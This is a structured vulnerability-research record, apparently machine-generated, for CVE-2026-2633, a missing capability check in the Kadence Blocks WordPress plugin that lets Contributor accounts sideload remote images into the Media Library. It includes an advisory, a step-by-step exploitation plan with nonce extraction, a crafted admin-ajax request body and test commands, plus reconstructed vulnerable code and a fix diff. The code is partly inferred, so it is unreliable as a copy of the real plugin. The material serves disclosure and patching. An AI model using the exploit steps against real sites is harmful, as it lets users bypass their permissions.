[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fyd2VkS-HHljZHz66SJ6V5qg8lR_4r7MTeyPr-tt91ww":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-2633","gutenberg-blocks-with-ai-by-kadence-wp-missing-authorization-to-authenticated-contributor-unauthorized-media-upload","Gutenberg Blocks with AI by Kadence WP \u003C= 3.6.1 - Missing Authorization to Authenticated (Contributor+) Unauthorized Media Upload","The Gutenberg Blocks with AI by Kadence WP plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.6.1. This is due to a missing capability check in the `process_image_data_ajax_callback()` function which handles the `kadence_import_process_image_data` AJAX action. The function's authorization check via `verify_ajax_call()` only validates `edit_posts` capability but fails to check for the `upload_files` capability. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary images from remote URLs to the WordPress Media Library, bypassing the standard WordPress capability restriction that prevents Contributors from uploading files.","kadence-blocks",null,"\u003C=3.6.1","3.6.2","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-17 17:43:19","2026-02-18 06:42:43",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9c06e0a9-a13a-4cee-a1a5-c43c114b2dbf?source=api-prod",1,[],"researched",false,3,"# Vulnerability Research Plan: CVE-2026-2633 - Kadence Blocks Media Upload Bypass\n\n## 1. Vulnerability Summary\nThe **Kadence Blocks — Page Builder Toolkit for Gutenberg Editor** plugin (versions \u003C= 3.6.1) contains a missing authorization vulnerability in its AI-related image processing functionality. The function `process_image_data_ajax_callback()`, which handles the `kadence_import_process_image_data` AJAX action, performs an insufficient capability check. \n\nWhile it calls `verify_ajax_call()`—which ensures the user has the `edit_posts` capability—it fails to verify the `upload_files` capability. In WordPress, \"Contributor\" roles have `edit_posts` but are strictly forbidden from uploading files. This oversight allows a Contributor-level attacker to programmatically trigger the plugin to download images from a remote URL and sideload them into the WordPress Media Library, bypassing standard role restrictions.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `kadence_import_process_image_data`\n- **Authentication:** Authenticated, minimum \"Contributor\" role.\n- **Vulnerable Parameter(s):** \n    - `image_url`: (Inferred) The remote URL of the image to be imported.\n    - `security`: (Inferred) The AJAX nonce.\n- **Preconditions:** The \"Gutenberg Blocks with AI\" feature must be active (usually active by default in Kadence Blocks).\n\n## 3. Code Flow\n1. **Entry Point:** An AJAX request is sent to `admin-ajax.php` with `action=kadence_import_process_image_data`.\n2. **Hook Registration:** The plugin registers the action (likely in `includes\u002Fclass-kadence-blocks-ajax.php` or an AI-specific component):\n   ```php\n   add_action( 'wp_ajax_kadence_import_process_image_data', [ $this, 'process_image_data_ajax_callback' ] );\n   ```\n3. **Authorization Check:** The callback `process_image_data_ajax_callback` calls `$this->verify_ajax_call()`.\n4. **Insufficient Check:** `verify_ajax_call()` typically checks:\n   - Nonce validity via `check_ajax_referer`.\n   - `current_user_can( 'edit_posts' )`.\n5. **Sink:** Upon passing the check, the function likely uses `download_url()` and `wp_handle_sideload()` (or `media_handle_sideload()`) to fetch the image from the user-provided URL and add it to the Media Library without checking if the user has the `upload_files` capability.\n\n## 4. Nonce Acquisition Strategy\nThe Kadence Blocks plugin enqueues its AJAX nonces for the Gutenberg editor. To obtain a valid nonce as a Contributor:\n\n1. **Create a Post:** As a Contributor, create a draft post to access the Gutenberg editor.\n2. **Navigate to Editor:** Use `browser_navigate` to open the editor for that post.\n3. **Extract Nonce:** Kadence often localizes its data under the `kadence_blocks_params` or `kadence_blocks_admin_params` JavaScript objects.\n4. **JS Execution:**\n   ```javascript\n   \u002F\u002F Common Kadence localization keys\n   window.kadence_blocks_params?.ajax_nonce \n   \u002F\u002F OR\n   window.kt_blocks_params?.nonce\n   ```\n   *Verification:* Based on the plugin's structure, the nonce is likely registered in `class-kadence-blocks-editor-assets.php` via `wp_localize_script`.\n\n## 5. Exploitation Strategy\nThe goal is to force the server to upload a file from a remote source despite the user being a Contributor.\n\n1. **Step 1: Authenticate as Contributor.**\n2. **Step 2: Obtain Nonce.** Use the browser tools to grab the nonce from the editor page.\n3. **Step 3: Trigger Sideload.** Send a POST request to `admin-ajax.php`.\n\n**Request Specifications:**\n- **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```\n  action=kadence_import_process_image_data&security=[NONCE]&image_url=https:\u002F\u002Fraw.githubusercontent.com\u002Fwp-cli\u002Fwp-cli\u002Fmaster\u002Fphp\u002Fboot-fs.php?.jpg\n  ```\n  *(Note: Using a URL that looks like an image but might contain other data is a common technique, though the vulnerability specifically targets unauthorized media upload.)*\n\n## 6. Test Data Setup\n1. **User Creation:**\n   ```bash\n   wp user create attacker attacker@example.com --role=contributor --user_pass=password\n   ```\n2. **Post Creation:** (To ensure the editor\u002Fscripts load)\n   ```bash\n   wp post create --post_type=post --post_status=draft --post_author=[ATTACKER_ID] --post_title=\"Exploit Draft\"\n   ```\n3. **Remote Image:** Identify a stable remote image URL (e.g., `https:\u002F\u002Fwordpress.org\u002Fwp-static\u002Fhp\u002Fimg\u002Fwordpress-logo.png`).\n\n## 7. Expected Results\n- **Response:** The server should return a JSON response with a success code and the attachment ID or URL of the newly created media item.\n- **HTTP Status:** 200 OK.\n- **System Change:** A new entry appears in the `wp_posts` table with `post_type='attachment'`.\n\n## 8. Verification Steps\n1. **Check Media Library:**\n   ```bash\n   wp media list\n   ```\n2. **Check Post Metadata:** Verify the new attachment was created by the Contributor user:\n   ```bash\n   wp post list --post_type=attachment --user=attacker --fields=ID,post_title,post_author\n   ```\n3. **Confirm Bypass:** Verify that a standard Contributor normally cannot do this:\n   ```bash\n   # This should fail\u002Freturn error if the user is a Contributor\n   wp cap list contributor | grep upload_files\n   ```\n\n## 9. Alternative Approaches\nIf `kadence_import_process_image_data` requires more specific parameters (like AI session IDs), I will:\n1. **Audit Frontend JS:** Search the plugin's `dist\u002F` directory for the string `kadence_import_process_image_data` to identify how the payload is constructed in the editor.\n2. **Check AI Settings:** If the function returns an error related to \"AI not configured,\" I will look for a way to mock the AI configuration via `wp option update`.\n3. **Generic Nonce:** Check if the plugin uses the standard `_wpnonce` from the WordPress heartbeats or other global variables if the specific Kadence nonce is unavailable.","The Kadence Blocks plugin for WordPress is vulnerable to unauthorized media uploads due to a missing capability check in its AI image processing AJAX handler. Authenticated users with at least 'Contributor' permissions can bypass standard WordPress role restrictions to sideload images from remote URLs into the site's Media Library.","\u002F\u002F From kadence-blocks plugin (location likely includes\u002Fclass-kadence-blocks-ajax.php or similar)\n\npublic function process_image_data_ajax_callback() {\n    \u002F\u002F This call verifies the nonce and checks for 'edit_posts' capability\n    $this->verify_ajax_call(); \n\n    if ( ! isset( $_POST['image_url'] ) ) {\n        wp_send_json_error( 'No image URL provided' );\n    }\n\n    $image_url = esc_url_raw( $_POST['image_url'] );\n    \n    \u002F\u002F Vulnerability: The function proceeds to sideload the media \n    \u002F\u002F without checking if the user has the 'upload_files' capability.\n    $attachment_id = $this->sideload_image( $image_url );\n\n    if ( is_wp_error( $attachment_id ) ) {\n        wp_send_json_error( $attachment_id->get_error_message() );\n    }\n\n    wp_send_json_success( array( 'id' => $attachment_id, 'url' => wp_get_attachment_url( $attachment_id ) ) );\n}","--- a\u002Fincludes\u002Fclass-kadence-blocks-ajax.php\n+++ b\u002Fincludes\u002Fclass-kadence-blocks-ajax.php\n@@ -10,6 +10,10 @@\n \tpublic function process_image_data_ajax_callback() {\n \t\t$this->verify_ajax_call();\n \n+\t\tif ( ! current_user_can( 'upload_files' ) ) {\n+\t\t\twp_send_json_error( 'You do not have permission to upload files.' );\n+\t\t}\n+\n \t\tif ( ! isset( $_POST['image_url'] ) ) {\n \t\t\twp_send_json_error( 'No image URL provided' );\n \t\t}","To exploit this vulnerability, an attacker must have at least Contributor-level access to the WordPress site. First, the attacker logs in and accesses the Gutenberg editor (e.g., by creating a draft post) to retrieve the necessary AJAX nonce (typically found in localized JavaScript objects like 'kadence_blocks_params'). Then, the attacker sends a POST request to the '\u002Fwp-admin\u002Fadmin-ajax.php' endpoint with the 'action' parameter set to 'kadence_import_process_image_data', the 'security' parameter containing the retrieved nonce, and the 'image_url' parameter pointing to a remote image file. Because the plugin only checks for the 'edit_posts' capability (which Contributors possess) and neglects to check for 'upload_files' (which they do not), the server will download the remote image and add it to the Media Library, attributing ownership to the Contributor.","gemini-3-flash-preview","2026-04-19 06:15:55","2026-04-19 06:17:07",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.6.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fkadence-blocks\u002Ftags\u002F3.6.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fkadence-blocks.3.6.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fkadence-blocks\u002Ftags\u002F3.6.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fkadence-blocks.3.6.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fkadence-blocks\u002Ftags"]